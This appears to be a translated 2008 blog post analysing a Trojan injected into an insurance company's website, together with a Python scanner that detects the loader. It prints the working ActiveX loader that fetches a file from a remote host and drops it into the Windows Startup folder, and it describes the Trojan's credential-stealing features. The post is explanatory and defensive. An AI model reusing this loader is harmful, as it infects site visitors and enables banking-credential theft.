Two days ago a so-called "Easter egg" appeared on the alfastrah.ru website: if you clicked the phone number in the upper right corner of the site header 5-6 times, a movie of erotic content started playing. Details of the viral campaign are described here.
It's no secret that viral marketing aims at very fast distribution, and visits to the site grew exponentially. On some forums there were warnings that, on entering the site, Kaspersky complained that a Trojan was sitting on the site. In a conversation with Kaspersky Lab staff this information was confirmed. Thus the "viral marketing" turned literally viral. Here are some expert comments.
Analysis of the site showed that, in addition to the erotic cartoon, there is a virus. The implementation is interesting: it is inserted neatly into the middle of the page. This is what gets loaded (the script is not even obfuscated):
google-analyze.com/counter/index.php
HTTP/1.1 200 OK
Date: Tue, 25 Nov 2008 15:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding, User-Agent
Content-Length: 475
Connection: close
Content-Type: text/html
<object classid="clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9" id="attack"></object>
<script>
var arbitrary_file = "google-analyze.com/tracker/load.php";
var destination = 'c:/Documents and Settings/All Users/Start Menu/Programs/StartUp/browsser.exe';
attack.SnapshotPath = arbitrary_file;
attack.CompressedPath = destination;
attack.PrintSnapshot(arbitrary_file, destination);
</script>
<embed src="pdf.php" type="application/pdf" width=100 height=100></embed>
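A defender-side check for this loader pattern, as an added example that is not from the original post or from Kaspersky Lab: a small scanner that flags captured HTML containing the Snapshot Viewer CLSID, the SnapshotPath/CompressedPath/PrintSnapshot file-write primitive, a drop destination inside the Startup folder, and a PDF embed served from a script. The sample page and the attacker.example hostname are constructed for the demo.

```python
import re

# CLSID of the Microsoft Access Snapshot Viewer ActiveX control abused by the loader above.
SNAPSHOT_VIEWER_CLSID = "f0e42d50-368c-11d0-ad81-00a0c90dc8d9"
# Property/method trio that together let a page write a remote file to a local path.
WRITE_PRIMITIVE = ("snapshotpath", "compressedpath", "printsnapshot")
# Autorun location (backslashes normalised to slashes before comparison).
STARTUP_HINT = "/start menu/programs/startup/"


def scan_html(html: str) -> list[str]:
    """Return findings explaining why the HTML looks like the Snapshot Viewer drop-loader."""
    flat = html.lower()
    findings = []
    # 1. The control is instantiated at all (ordinary pages have no reason to embed it).
    if SNAPSHOT_VIEWER_CLSID in flat:
        findings.append("snapshot viewer activex control instantiated (clsid match)")
    # 2. All three parts of the arbitrary-file-write pattern are present.
    if all(name in flat for name in WRITE_PRIMITIVE):
        findings.append("arbitrary file write pattern: " + ", ".join(WRITE_PRIMITIVE))
    # 3. Any quoted Windows path: flag Startup-folder drops, then bare executables.
    for m in re.finditer(r"""["']([a-z]:[\\/][^"']+)["']""", flat):
        dest = m.group(1).replace("\\", "/")
        if STARTUP_HINT in dest:
            findings.append(f"dropped file lands in startup folder: {dest}")
        elif dest.endswith(".exe"):
            findings.append(f"dropped file is an executable: {dest}")
    # 4. An <embed> declared as PDF but whose source is a script, not a .pdf file.
    for m in re.finditer(r"""<embed[^>]+src\s*=\s*["']([^"']+)["'][^>]*application\s*/\s*pdf""", flat):
        if not m.group(1).endswith(".pdf"):
            findings.append(f"pdf embed served from script: {m.group(1)}")
    return findings


# Constructed sample modelled on the loader quoted above (placeholder host, not a live capture).
SAMPLE = """<object classid="clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9" id="attack"></object>
<script>
var arbitrary_file = "http://attacker.example/tracker/load.php";
var destination = 'c:/Documents and Settings/All Users/Start Menu/Programs/StartUp/browsser.exe';
attack.SnapshotPath = arbitrary_file;
attack.CompressedPath = destination;
attack.PrintSnapshot(arbitrary_file, destination);
</script>
<embed src="pdf.php" type="application/pdf" width=100 height=100></embed>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE):
        print("!", finding)
```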
The virus has one peculiarity: it blocks delivery on repeat visits. The payload is served only the first time a given IP address loads the page; later requests from the same address get nothing. So if people browse from an office that goes through a shared proxy, only the first visitor is infected.
An unpatched vulnerability was used to inject the code into the site.
The beast is a one-to-one copy of the PoC published here:
http://www.xakep.ru/post/44605/Microsoft-Access-Snapshot-Viewer-ActiveX-Control-Exploit.txt
The bot's functionality, besides the standard procedures for installing itself in the system, injecting into running processes, fighting some antiviruses and providing anonymous SOCKS and HTTP proxy services, includes a very powerful information-theft component:
- The Trojan steals the contents of Protected Storage, which holds user passwords.
- Formgrabber. The Trojan intercepts any data submitted through browser forms. The monitored addresses from which data is intercepted are, as a rule, those of banks and payment systems. This is how accounts are stolen.
- Bypassing virtual keyboards. The Trojan intercepts mouse clicks and takes a screenshot at that moment.
- Substitution of sites and pages. This is a very interesting method, previously used in Nuclear Grabber. When the user tries to open one of the sites monitored by the Trojan, either the request is redirected to a fake phishing site or a new data-entry field is added to the original page. The page content is replaced directly on the user's computer, even before it is displayed in the browser!
- Theft of certificates.

Despite appeals to Alfa Insurance from Kaspersky Lab and other individuals (I myself, for example, wrote 2 letters to them), the vulnerability is still not fixed, and a Trojan is still hanging on the site; it seems to be a new one.

I want to thank the Kaspersky Lab employees for their speed and the technical comments.